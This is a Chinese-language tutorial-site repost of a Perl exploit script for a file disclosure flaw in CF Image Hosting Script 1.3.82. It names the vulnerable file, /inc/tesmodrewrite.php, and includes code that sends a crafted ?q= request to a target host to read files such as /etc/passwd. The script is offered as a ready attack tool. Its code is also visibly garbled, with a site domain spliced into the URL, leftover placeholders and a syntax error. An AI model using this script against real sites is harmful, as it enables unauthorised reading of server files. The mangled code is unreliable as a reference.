来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] #!/usr/bin/perl#CF Image Hosting Script 1.3.82 File Disclosure Exploit#Bugfounder and Exploitcoder: bd0rk联系方式: www.sohcrew.school-of-hack.net www.2cto.com #eMail: bd0rk[at]hacker......
|
#!/usr/bin/perl
#CF Image Hosting Script 1.3.82 File Disclosure Exploit #Bugfounder and Exploitcoder: bd0rk 联系方式: www.sohcrew.school-of-hack.net www.2cto.com #eMail: bd0rk[at]hackermail.com 影响程序: CF Image Hosting Script 1.3.82 开发者: http://www.phpkode.com 下载地址: http://phpkode.com/download/p/CF_Image_Hosting_v1.3.zip
问题代码位于/inc/tesmodrewrite.php 28行 #echo "Current URL: " . $_GET['q'];
#Tested on Ubuntu-Linux
use LWP::Simple; use LWP::UserAgent;
sub help() { print "Sploit: perl $0 [targethost] /dir/\n"; }
print "\nCF Image Hosting Script 1.3.82 File Disclosure Exploit\n"; print "\ By bd0rk bd0rk[at]hackermail.com\n";
($inc, $targethost, $dir, $file,) = @ARGV;
$inc="/inc/"; $file="tesmodrewrite.php?q=[APossibleFile]"; my $url = "http:// www.2cto.com ".$targethost.$dir.$inc.$file;
my $useragent = LWP::UserAgent->new(); my $req = $useragent->get($url,":content_file"=>"[APossibleFile]");
if ($req->is_success)
{
print "$url <= H3h3!\n\n"; print "etc/passwd\n";
exit(); } else { print "Sploit $url Mhhh!\n[!]".$req->status_line.\n";
exit(); } |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
